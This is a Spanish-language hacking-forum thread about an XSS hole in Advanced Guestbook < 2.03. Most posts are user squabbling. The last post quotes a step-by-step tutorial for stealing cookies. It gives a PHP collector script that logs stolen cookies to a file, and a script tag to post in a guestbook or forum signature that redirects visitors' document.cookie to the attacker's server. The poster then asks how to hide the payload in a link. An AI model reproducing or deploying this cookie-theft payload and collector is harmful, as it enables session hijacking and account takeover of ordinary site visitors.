elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 20:24  


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  [OB] Advanced Guestbook < 2.03 XSS
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: [OB] Advanced Guestbook < 2.03 XSS  (Leído 6,713 veces)
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.645



Ver Perfil
Re: Advanced Guestbook remote XSS
« Respuesta #15 en: 28 Diciembre 2005, 14:57 »

No se le tiene que borrar , cuenta o nada, solo que se de cuenta de como son las cosas, y mi comentario solo fue de buena fe
En línea
whaky

Desconectado Desconectado

Mensajes: 151


Angel del Infierno


Ver Perfil
Re: Advanced Guestbook remote XSS
« Respuesta #16 en: 28 Diciembre 2005, 15:20 »

lo dice por 3 post seguidos poniendo 0......  :rolleyes:
y stams kmbiando el tema del post en otro....  ::)
En línea

Los muertos hablan y las paredes oyen
por si acaso nunca reveles tu identidad.
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.645



Ver Perfil
Re: Advanced Guestbook remote XSS
« Respuesta #17 en: 28 Diciembre 2005, 15:27 »

Bro, de verdad que si uno se hiciera mala sangre, por esas capulladas, este foro estaria cerrado, XD, mira si no acepta criticas , que importa , en cualquier momento se le banena + su payload de regalo
En línea
Hans el Topo


Desconectado Desconectado

Mensajes: 1.748


"Estoy cansado de no hacer nada"


Ver Perfil WWW
Re: Advanced Guestbook remote XSS
« Respuesta #18 en: 26 Febrero 2006, 01:52 »


 Hacking / Hacking Básico / Re: XSS  en: 08 Noviembre 2005, 22:38 
-------------------------------------
La mejor forma de emplear XSS
=====================

Luego de que verificaste que era Vulnerable
-Lo mejor es emplear scripts que funcionen como cliente servidor, por ejemplo:
--->Creas el fichero cookies.php con la siguiente información:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>
--------------------Hasta aquí
Line 1 - Obtiene del post que vas a enviar sólo la cookie
Line 2 - Crea el archivo archivo.txt
Line 3 - Dentro de archivo.txt mete la cookie (modo agregar)
Line 4 - Cierra el fichero y se guarda todo

--->Luego subis el fichero cookies.php a un servidor donde tengas hosting, o sea accesible desde la web, (por FTP, ssh o via web u otros)
--->Bien Suponiendo que tu host sea:
http://www.miservidor.com
quedaría
http://www.miservidor.com/cookies.php
-----------------------------------------------------------------------
                 FIN DE CONFIG. DEL SCRIPT TIPO SERVER

-----------------------------------------------------------------------
                 INICIO DE SCRIPT TIPO CLIENTE
---> Este script sólo hará que se conecte a tu server (este es el que se postea en el libro de visitas o tag's, ya que si lo haces desde el buscador solo obtendras la cookie actual, y no  todas.
code:
<script>window.location='http://www.miservidor.com/cookies.php?cookie='+document.cookie;</script>
ahora recibiras las cookies en tu archivo.txt

---------
        INICIO DE SCRIPT TIPO CLIENTE
---> Este script sólo hará que se conecte a tu server (este es como se coloca este codigo en la firma de un foro?
<script>window.location='http://www.miservidor.com/cookies.php?cookie='+document.cookie;</script>
ahora recibiras las cookies en tu archivo.txt

alguien podria explicarme como podria añadir esto en un link(hipervinculo) para poder pillar las cookies de esa página?
seria de mucha ayuda, gracias por ayudar a los que estamos empezando a aprender como defendernos de estas cosas


---------
En línea

 
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Advanced And Comprehensive Use Of Nmap Written By juh
Hacking Avanzado
juh 3 1,581 Último mensaje 15 Enero 2011, 00:10
por saliaz22
Advanced Renamer 3.02: El renombrado masivo de archivos nunca fue tan fácil
Noticias
wolfbcn 0 343 Último mensaje 5 Abril 2011, 02:17
por wolfbcn
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines